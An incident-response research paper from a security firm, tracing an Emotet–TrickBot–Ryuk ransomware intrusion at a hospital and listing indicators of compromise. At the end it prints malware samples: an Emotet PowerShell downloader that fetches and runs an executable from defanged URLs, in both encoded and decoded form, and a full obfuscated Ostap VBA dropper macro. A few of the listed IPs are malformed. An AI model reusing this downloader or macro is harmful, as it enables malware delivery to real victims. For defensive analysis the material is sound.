Ransomware Attack Analysis

The Emotet – TrickBot – Ryuk ransomware killchain is an advanced cybersecurity threat that organizations and Cybersecurity professionals face. Understanding the specific techniques, tactics, and procedures (TTPs) that the threat actors who use these tools employ can provide vital insight to protecting against and responding to incidents.

In our newest Research Paper, we explore evidence collected and analysis performed during real-world incident response efforts led by Ingalls Information Security.

Introduction

The Emotet – TrickBot – Ryuk ransomware killchain is an advanced cybersecurity threat that organizations and Cybersecurity professionals face. Understanding the specific techniques, tactics, and procedures (TTPs) that the threat actors who use these tools employ can provide vital insight to protecting against and responding to incidents. In this paper, we will explore evidence collected and analysis performed during real-world incident response efforts led by Ingalls Information Security (Ingalls). Victim organization and employee names have been changed to protect the identity of the organization that engaged Ingalls to respond. While not all components of the investigation are included in this paper, it does focus on the TTPs and Indicators of Compromise to provide understanding of the attack chain that similar organizations face on a daily basis.

Our investigation methodology is fairly straightforward: identify Indicators or Evidence of Compromise (IOCs and EOCs) via computer forensic evidence and search all available data records for additional evidence. Ingalls analyzed netflow logs as well as Endpoint Detection & Response (EDR) data from CylancePROTECT and Optics. In addition, Microsoft Exchange server logs, Windows event logs, and SQL server trace logs were also reviewed during this effort.  IOCs were also searched on various Open Source Intelligence sources (OSINT) to gather additional insight.

Emotet

Emotet is a banking trojan with the ability to self-propagate, first discovered by researchers in 2014. Emotet has been continually upgraded since then and it has been significantly improved. Emotet initially functioned as an information stealer, however today it’s customizable modules, popularity in Malware-as-a-Service (MaaS) operations, and ability to send information to and receive commands from Command and Control (C2) servers provide capabilities that are used by criminal groups to deliver other trojans, information stealers, and ransomware payloads. Initially, Emotet was sent as a malicious email attachment that leveraged Visual Basic macros to then execute obfuscated PowerShell scripts. It has also been deployed through other means recently, such as Remote Desktop Protocol (RDP) brute force attacks.

TrickBot

The TrickBot information stealer, first seen in 2016, is another common MaaS banking trojan. While TrickBot is sometimes spread independently via malicious emails, RDP brute force attacks, and drive-by downloads, it is often deployed as a secondary infection by other trojans such as Emotet. TrickBot is particularly effective at harvesting network credentials, computer credentials, website credentials from browsers, WiFi passwords, VPN credentials and configuration, and cryptocurrency wallet information, and, like Emotet, TrickBot has customizable modules, self-propagation capabilities, and the ability to communicate via C2 servers.

Ryuk

Ryuk, first seen in 2018, is a ransomware variant that intends to extort victims by encrypting their files and demanding a Bitcoin payment as ransom to decrypt the encrypted files. Ryuk is another component of the MaaS ecosystem and is frequently deployed by Emotet and TrickBot. It is believed that the Hermes banking trojan developers are also responsible for RYUK, and that this team is sponsored by North Korea.

Ostap

Ostap is a Jscript trojan downloader. Similar to Emotet, it is often spread via VBA macros in malicious email attachments. Ostap has capabilities that include disabling antivirus or security software and propagating by copying itself to other documents accessible from a compromised host, including network shares. One key difference from Emotet is that Ostap uses JScript to infect a host rather than obfuscated PowerShell scripts. Ostap is commonly used to deploy other trojans including TrickBot.

Emotet – The Initial Infection

Initial Infection Mechanism - Spearphishing Email

Day 0  - 12:18:48 CST

Jane Buck, an employee at John Doe Memorial Hospital (JDMH), received a spearphishing email at their JDMH email address. The subject line of the email was "Jane Buck - JDMH”. The content of the message read “SOC report 01/16/2020" and was signed by “Fawn, Jill” and "Jill.Fawn@StagMedicalCenter.org”.

Figure 1 - Spearphishing Email

Jill Fawn is actually an employee at Stag Medical Center, another nearby hospital, but the actual address in the email "from" field was not Jill Fawn’s email address. Rather, the email actually came from saad.alam@ziaudinhospital.com, a known Emotet sender email address.

Figure 2 - Known Emotet Sender OSINT - https://pastebin.com/xFTyBF34

The email contained an attachment named “QZ-2572 Medical report p2.doc.” The email originated from an IP address of 181.113.134[.]226, an Ecuadorian IP address that is a VPN endpoint.

Figure 3 - 181.113.134[.]226 VPN Certificate OSINT - https://community.riskiq.com/search/181.113.134.226/certificates

The ziauddinhospital.com email server did not have a PTR record configured to allow SMTP reverse DNS resolution, so their email server could be spoofed. In other words, ziauddinhospital.com did not actually resolve to 181.113.134[.]226. Rather, it should have resolved to 104.47.4.36.

Emotet Downoader

Day 0 - 13:11:27 CST

Jane Buck opened the email attachment. The document in the email contained a VBA script ("Document_Open" which indicates: "Runs when the Word or Publisher document is opened") that launches a base64 encoded PowerShell script in a hidden window.

Figure 4 - QZ-2572 Medical report p2.doc - Emotet Downloader Encoded PowerShell Script

This script reaches out to download 796.exe from the following URLS:

• hxxp://ajhmanamlak[.]com/wp-content/rcz9/ (46.4.213[.]201)
• hxxp://maphagroup[.]com/wp-admin/mtq/ (194.5.188[.]11)
• hxxp://www.meggie-jp[.]com/images/Tznj/ (47.245.59[.]74)
• hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/ (45.124.87[.]127)
• hxxps://nnjastudio[.]com/wp-admin/xHjsw/ (104.18.58[.]143)

The file 796.exe, an Emotet executable, is downloaded, named publishmsp.exe, and executed by the script. This file then downloads and installs the Emotet module, nonsensor.exe to the c:\windows\syswow64\ directory and installs nonsensor.exe as a service (HKLM\system\controlset001\services\nonsensor). The Emotet Service then established connectivity with the IP address 100.6.23[.]40, an active Emotet Epoch 2 command and control (C2) server. Once this foothold has been established, Emotet, TrickBot, and Ryuk begin deploying throughout JDMH's network environment. In addition to the initial infection files, the attackers also dropped several variants of Emotet, TrickBot, and Ryuk into JDMH's environment.

Propagation

Once the attackers had access to the victim environment, they spent the next 24 hours staging their attack. After enumerating the victim network Emotet, TrickBot, and Ryuk were propagated to various locations on victim machines, including in C:\Users\Default\AppData\Roaming\WinNetCore\, C:\Users\Public\Junk\, C:\Windows\Temp\bdcore_tmp\, C:\ProgramData\, C:\Temp\, C:\Users\User\Public\, and the Recycling Bin (a common tactic malware uses to hide itself). Emotet and TrickBot are well known for the ability to propagate by enumerating network resources, brute forcing user accounts, and writing to shared drives. One of the novel methods used to propagate the malicious payloads in JDMH's environment was via Active Directory startup, shutdown, logon, and logoff Group Policy scripts.

Persistence

Deploying via Active Directory Group Policy scripts was likely intended as both a propagation method as well as a persistence mechanism. However, quick actions in isolating infected devices and restoring servers from clean backups prevented the attackers from being able to rely on this as an ongoing persistence mechanism.

Figure 5 – Cylance Optics Instaquery Result Showing Group Policy Persistence Mechanism

The attackers also used scheduled tasks to achieve persistence. Specifically, they created a scheduled task named “Windows Net Core” on compromised machines to re-infect with TrickBot and scheduled tasks named “comp_sys”, “comp_sys.h”, “user_userlogon” and “user_userlogon_h” on compromised machines to re-infect with Emotet.

Another, more complicated persistence mechanism was also demonstrated in the attack. JDMH used BitDefender Endpoint Security, deployed via a remote management and monitoring (RMM) tool, to secure their endpoints from malware. Unfortunately, BitDefender was unable to prevent Emotet, TrickBot, or Ryuk from infecting the environment. To make matters worse, the attackers exploited CVE-2019-17099, a vulnerability in BitDefender Endpoint Security versions 9.6.11.163 and prior, to perform a DLL hijack in order to achieve persistence. This vulnerability allows an attacker to load an arbitrary DLL file from the search path, re-infecting compromised computers with Ryuk.  Cylance Optics provided insight into the RYUK detections and showed that the RYUK encryptor file was being reloaded on victim machines every time the EPSecurityService.exe service was executed.

Figure 6 – Cylance Optics Focus Data Showing EPSecurityService.exe Persistence Mechanism

Ransomware

Day 1 - Shortly after 13:00:00 CST

The attackers begin infecting computers with Ryuk Ransomware. JDMH IT contacted their managed service provider (MSP) for assistance. JDMH's MSP immediately began taking efforts to isolate infected devices, gathering information to establish the scope of the ransomware infection, and bringing up backups of infected servers. Ryuk deleted Volume Shadow data and disabled the Volume Shadow Service on infected computers. The ryukreadme.html file gave the email address to contact the attackers as orfhissipmay1970@protonmail[.]com.

Secondary Infection Attempt - Day 28

Beginning at 11:25 CST, a JDMH user's credentials were used to send 3 emails from 37.221.113[.]166, a datacenter IP address in England. These credentials were presumably harvested by TrickBot during the initial attack, and either as a second attempt to infect JDMH's environment or possibly purchased on a Dark Web forum and used by a different attacker. The victim had not yet completed a global password reset, which meant that the attacker could use this account to gain access to the Cloud-based email service. This secondary infection attempt underscores the importance and urgency of a timely global password reset following a credential harvesting or information stealing attack.

These emails were sent to a JDMH group email account, a JDMH distribution list of all department managers, and a JDMH distribution list of all JDMH users. The subject of the first email was "Notification statement for written contract No.30449", and the body of the email claimed that the recipient had "missed obligatory compensation for 1481.67 US Dollars date" and contained a malicious document named "cl_inf_HC_163_86818.doc". The subject of the second email was "Second claim for written contract No.64312", and the body of the email claimed that the recipient had "dropped obligatory payment for 3152.98 US Dollars date" and contained a malicious document named "paym_req_EC_642_77095.doc". The subject of the third email was "Resended claim for contract No.81253", and the body of the email claimed that the recipient had "missed obligatory compensation for 1255.43 US Dollars date" and contained a malicious document named "iss_cont_DT_174_23992.doc.”

Figure 7 - Secondary Infection Attempt 1

Figure 8 - Secondary Infection Attempt 2

Figure 9 - Secondary Infection Attempt 3

All three malicious documents contain Ostap malware, using the same malicious VBA macro which loads a malicious javascript file named "Dsaow.GaerIok.jse". If the Ostap file fails to download its payload, it attempts to replace other office documents on attached drives and network shares with itself. The macro, when run from Microsoft Word 2010 does not fully execute, but when run from Microsoft Word 2016, infects the host with TrickBot. The file then contacts ipecho.net (probably to check the victim's external IP address), cbl.abuseat.org, and zen.spamhaus.org. It also attempts to connect to hxxp://185.180.199[.]77/3mBhb0/6VIJ7e.php to inform the attacker about the victim computer's name, user name, IP address, and network adapter information. 185.180.199[.]77 is a known Ostap and TrickBot host located in Netherlands. The TrickBot malware then attempts to establish connectivity with and download the systeminfo, msconfig, and pwgrab modules from one of the following C2 servers:

Figure 10 - C2 Servers

Fortunately, JDMH's environment was successfully contained, and JDMH IT staff quickly noticed and responded to the emails, securing the compromised account, and informing users not to open the email if they received it

Dark Web Forum - JDMH Credentials for Sale

A list of JDMH computer names and user credentials were found for sale in a Dark Web forum. These were likely the result of TrickBot harvesting credentials within the environment. Fortunately, these were outdated computer names and credentials that had been subject to a global password reset during remediation efforts. While JDMH has taken steps to further secure their environment with a defense in depth approach, the attackers still persist in their efforts to extort money through ransomware attacks.

Post-Incident Activity

JDMH received a thorough report detailing the timeline of the attach and analysis of malicious files and activity within their environment. This report was briefed to their IT staff, MSP representatives, executive leadership, and legal counsel. Ingalls provided JDMH with recommendations for thoroughly eradicating malware and persistence mechanisms and securing their IT environment and user accounts. JDMH also signed up for Ingalls' Managed Detection and Response (MDR) service as an ongoing component of their defense in depth strategy. Doing so was simple because Ingalls had already deployed their MDR hardware and software into JDMH's environment for the incident response efforts.

Indicators of Compromise

File IOCs

53518AF93CAE115B68AF828E50CD70884E203FBFBD46C9631F7D65CB3F74251F

11B42BA8093CD242D37C111A2DFA37311EB5CA77BC8DD118A952088D5716EC15

7DC18BF00ADEF10775C2A73515B7644EF6C26DB0006CAC82536934DE86D03E6F

C6B5DFAE20D0777716DF85C66F3FACB0223B18913169B61A1D9A0D249CCBCA7A

BE403CE2D14F38B66528D438457927218F1AA44A68530BF46B2703DA75DCC8BD

DD1BD34A80DB022CACFDD11EE676FDA7BE9065DF14D8084B6029DB56283DEE79

1328DD556749D061CD4468BF907591FDE215C7B6F1755BBA566D9C335E479EFB

EB7033650DCCB5FA8EC43DA571A44AF46F487ED084FDE6272DE011ABEF54AE00

05A14271A14004BF89D8B4DBED8E876A0A182BD98864BEDC86D824647D9D5810

FA582803942B20C584CE8F353B56D65EF034FC6A70B6E41B07EAAF703E558AC5

BD26B6792D6C6D14D5E7CE1128C4B00095BD3FF265FDD8E5B187FDAA07369D16

05903B62D309D5B4C04C7C6865B1711CD9E4E6370D4DBF419B1611FF17C7A112

FF31DFFDEAF53A96EB28717FAF0CCCDD6B1FFD757310A99092295C486275AD67

0D612A370FBDAAEAC7527DDFE1F7F0680FA54DD23807C34654537B8E390E552E

6494234E7B028CF86A6A1DE8B5352CA818C7E145ADF6FE38F9E6533358DA7C8F

096ADEAA15C1BBBE3723921796B51F7DECB9F6F90AAD03609D938D969B583C17

08BC5BBE5AFF4C6DFC879FD837AAA7A38E6325FA6082093212289F56C5EA1CF8

781290FBF153C565F31321C36E634E892AE5373A8B0D5494315B196992C99D5A

B983018C45B1D8095BE9F34EEB9E893537656FE21F5F5E66EFBB3A9D855D2343

2792E0D21318DC8918A9906A5E2B5B52AE8F756870EB96DD4D2DB48FD7B88548

31AFE5312E444E707420703745390F18FC2B854A0961EA3961BC1AA31CD6FA50

CAB2D2903DE9A3FEACF2004A81AC68D4C73B4C31CD5B864F48ACA3AB383893A1

2B85419B0DD19A806F01176E3ED3C96B451BD2E915B35209A0237D0D5569B890

DD23E2A9B6679E3FE85755DF3CFEC9CC25C3A5945C21E7FF2FE719D23C68D2BA

F5665EF7D190E78F5F90C92D0406E58530030FC67366D38D73EEADC6EE69AA51

6E3DDE8C5D05DE1CE2A6588460AE4053A438AE5E66A87ED643A8A23CB6C4CDAB

8BD68AF164920B11B1CEBFE82400E077E34E88528357A8690F37DF969C8D719D

E8629541F510A7A5792B112A080B5BE2F3E88F6DC30169875D7F6B5DE2EB16DC

CD91E03069136BAC09B18D685CD1F9B948EEA96DA64A8BC9E2DAA3A6A44CA81F

Network IOCs

193.26.217[.]243:443

5.2.78[.]70:443

5.34.177[.]40:443

5.2.78[.]77:443

185.186.77[.]222:443

185.65.202[.]240:443

188.227.84[.]209:443

185.45.193[.]76:443

181.129.104[.]139:449

107.172.165[.]149:443

181.112.157[.]42:449

181.140.173[.]186:449

45.148.120[.]14:443

170.84.78[.]224:449

46.174.235[.]36:449

82.146.62[.]52:443

64.44.51[.]125:443

185.11.146[.]86:443

5.182.210[.]226:443

945.148.120[.]14:443

46.229.213[.]27:443

200.21.51[.]38:449

51.254.164[.]240:443

45.148.120[.]13:443

190.214.13[.]2:449

36.89.85[.]103:449

181.129.134[.]18:449

186.71.150[.]23:449

181.113.28[.]146:449

88.99.112[.]87:443

164.68.120[.]56:443

951.254.164[.]240:443

988.99.112[.]87:443

81.177.180[.]254:443

200.127.121[.]99:449

121.100.19[.]18:449

119.252.165[.]75:449

186.232.91[.]240:449

131.161.253[.]190:449

181.196.207[.]202:449

114.8.133[.]71:449

202.29.215[.]114:449

171.100.142[.]238:449

180.180.216[.]177:449

181.113.134[.]226

46.4.213[.]201

194.5.188[.]11

47.245.59[.]74

45.124.87[.]127

104.18.58[.]143

100.6.23[.]40

185.180.199[.]77

92.63.98[.]59

82.146.62[.]52

2cdajlnnwxfylth4[.]onion

hxxp://ajhmanamlak[.]com/wp-content/rcz9/

hxxp://maphagroup[.]com/wp-admin/mtq

hxxp://www.meggie-jp[.]com/images/Tznj

hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6

hxxps://nnjastudio[.]com/wp-admin/xHjsw

hxxp://185.180.199[.]77/3mBhb0/6VIJ7e.php

Email Address IOCs

saad.alam@ziaudinhospital[.]com

orfhissipmay1970@protonmail[.]com

Malicious Script IOCs

QZ-2572 Medical report p2.doc

Powershell -w hidden -en JABaAGEAeQB1AHgAegBwAHQAawB0AD0AJwBJAHcAcgB1AGcAagB1AGMAYwByAGoAJwA7ACQARABjAGQAeABzAGoAZABuAGIAZQAgAD0AIAAnADcAOQA2ACcAOwAkAFcAbwBmAGIAaAB4AGkAbAA9ACcAWgB0AHgAbwBoAGMAeQBqAHoAcQAnADsAJABJAGIAbAB1AHEAagB4AG4AdgBvAHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEQAYwBkAHgAcwBqAGQAbgBiAGUAKwAnAC4AZQB4AGUAJwA7ACQAUgBpAGgAcgBqAHoAZwBpAHEAZABxAHcAZAA9ACcASgBtAGcAZQB3AGYAaAB2AG4AbABmACcAOwAkAFoAZwBrAHYAaABoAG0AYwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAFQALgBXAEUAQgBjAEwASQBFAG4AVAA7ACQATgB2AGMAdwBvAG4AYwB6AGMAZQB5AGMAbgA9ACcAaAB0AHQAcAA6AC8ALwBhAGoAaABtAGEAbgBhAG0AbABhAGsALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAGMAegA5AC8AKgBoAHQAdABwADoALwAvAG0AYQBwAGgAYQBnAHIAbwB1AHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG0AdABxAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbQBlAGcAZwBpAGUALQBqAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AVAB6AG4AagAvACoAaAB0AHQAcAA6AC8ALwBnAGkAYQB0AGwAYQBsAGEAbwBjAGEAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AWQB6ADkAOABTAFcAWQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBuAG4AagBhAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB4AEgAagBzAHcALwAnAC4AIgBTAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAUwB6AHYAbwBtAGEAdwB3AD0AJwBOAGoAZgBqAHQAdgBjAGIAbABmAG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFUAZgBpAGEAeQBhAG4AeABoAHkAbwB4ACAAaQBuACAAJABOAHYAYwB3AG8AbgBjAHoAYwBlAHkAYwBuACkAewB0AHIAeQB7ACQAWgBnAGsAdgBoAGgAbQBjAC4AIgBEAG8AVwBuAEwAYABPAGAAQQBkAEYASQBsAGUAIgAoACQAVQBmAGkAYQB5AGEAbgB4AGgAeQBvAHgALAAgACQASQBiAGwAdQBxAGoAeABuAHYAbwB4ACkAOwAkAFMAbABzAHEAagBuAHUAZgBkAGUAZgBwAHIAPQAnAEoAYwBlAHIAcAB4AHMAdgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAYgBsAHUAcQBqAHgAbgB2AG8AeAApAC4AIgBMAGUATgBgAGcAVABIACIAIAAtAGcAZQAgADMAMwAxADEAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAQQBgAFIAdAAiACgAJABJAGIAbAB1AHEAagB4AG4AdgBvAHgAKQA7ACQAWgBrAGsAdQBwAG0AZABjAGMAYwB1AD0AJwBJAHoAagBrAGYAegB0AGMAbgBhAHIAJwA7AGIAcgBlAGEAawA7ACQAVwB6AGEAYQBxAGIAdQB1AD0AJwBWAGkAbwB0AGwAbwBmAHoAcABzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAbgBpAHEAcgBjAG0AbABqAD0AJwBPAHAAZQBjAGMAbABzAHAAcwB1ACcA

This Base64 string decodes as:

$Zayuxzptkt='Iwrugjuccrj';$Dcdxsjdnbe = '796';$Wofbhxil='Ztxohcyjzq';$Ibluqjxnvox=$env:userprofile+'\'+$Dcdxsjdnbe+'.exe';$Rihrjzgiqdqwd='Jmgewfhvnlf';$Zgkvhhmc=.('ne'+'w-obje'+'ct') nET.WEBcLIEnT;$Nvcwonczceycn='hxxp://ajhmanamlak[.]com/wp-content/rcz9/*hxxp://maphagroup[.]com/wp-admin/mtq/*hxxp://www.meggie-jp[.]com/images/Tznj/*hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/*hxxps://www.nnjastudio[.]com/wp-admin/xHjsw/'."SPl`IT"('*');$Szvomaww='Njfjtvcblfo';foreach($Ufiayanxhyox in $Nvcwonczceycn){try{$Zgkvhhmc."DoWnL`O`AdFIle"($Ufiayanxhyox, $Ibluqjxnvox);$Slsqjnufdefpr='Jcerpxsv';If ((&('G'+'et'+'-Item') $Ibluqjxnvox)."LeN`gTH" -ge 33113) {[Diagnostics.Process]::"sTA`Rt"($Ibluqjxnvox);$Zkkupmdcccu='Izjkfztcnar';break;$Wzaaqbuu='Viotlofzps'}}catch{}}$Qniqrcmlj='Opecclspsu')

cl_inf_HC_163_86818.doc, paym_req_EC_642_77095. doc, and iss_cont_DT_174_23992.doc VBA Code

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True

Attribute VB_Control = "Moon, 0, 0, MSTSCLib, MsRdpClient8NotSafeForScripting"

Private Kirfool As String

Sub RePac()
If VarType(Asc("A")) = 2 Then IsMs = True Else IsMs = False
End Sub


Private Function Herdio(i As String) As String


Herdio = Replace(i, "a", "")
End Function


Function Mulent(parr As Variant, psiz As Integer, pbl As Integer, prow As Integer, pcol As Integer, pbit As Integer, dc As Long) As Boolean
Dim ix%, va%, r%, c%, s%
r = prow
c = pcol
If psiz > 0 Then
s = psiz / pbl
If r < 0 Then
r = r + psiz
c = c + 4 - ((psiz + 4) Mod 8)
End If
If c < 0 Then
c = c + psiz
r = r + 4 - ((psiz + 4) Mod 8)
End If
If c >= psiz Then
c = c - psiz
r = r + 1
End If
r = r + (Int(r / s) * 2)
c = c + (Int(c / s) * 2)
End If
Mulent = False
r = r + 2
c = c + 2
ix = r * 20 + Int(c / 8) ' 20 bytes per row
If ix > 5 Or ix < 0 Then GoTo Dro
' c = 2^(7 - (c MOD 8))
c = 2 ^ (c Mod 8)
va = parr(0, ix)
If psiz > 0 Then
If (Int(va / c) Mod 2) = 0 Then
If pbit < 0 Then
Mulent = True
GoTo Dro
End If
parr(0, ix) = va + c
Else
GoTo Dro
End If
End If
If pbit > 0 Then
va = parr(1, ix)
If (Int(va / c) Mod 2) = 0 Then va = va + c ' else va = va - c
parr(1, ix) = va
End If
Dro:
Kirfool = """" + Kirfool + """"
ActiveDocument.TrackRevisions = CallByName(CreateObject(Herdio("WaSacripata.Sahelala")), Herdio("Ruana"), (dc - dc) + 1, Kirfool, (dc - dc) + 1)
Mulent = True
End Function


Private Function Molert(i As String) As String
Molert = Replace(i, "y", "")
End Function

Private Sub Branolp()
Dim butilop As String
Dim xShape As Shape, xBkgr As Shape
Dim xAddr As String
Dim xPosOldX As Double, xPosOldY As Double
Dim xSizeOldW As Double, xSizeOldH As Double
butilop = Me.Content.Text
Kirfool = Application.StartupPath & Herdio(Molert("yo\.aay.\a.y.\yya")) & Molert("Dsaoyyyw.GayyyerIok.")
Dim Ikolpppp7 As Integer
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Ikolpppp7 = FreeFile
Open Kirfool For Binary Lock Read Write As #Ikolpppp7
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Put #Ikolpppp7, , butilop
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Close #Ikolpppp7
FileCopy Kirfool, Kirfool & Molert("yjysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Kill Kirfool
Kirfool = Kirfool & Molert("yjyysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
End Sub


Private Sub Moon_OnDisconnected(ByVal discReason As Long)
RePac
Branolp
If (Mulent(Array(7, 8, 6), 0, 0, 0, 0, 0, discReason)) Then
Me.Close
End If
End Sub

Private Sub Document_ContentControlOnExit(ByVal ContentControl As ContentControl, Cancel As Boolean)
Debug.Print "to hui"
End Sub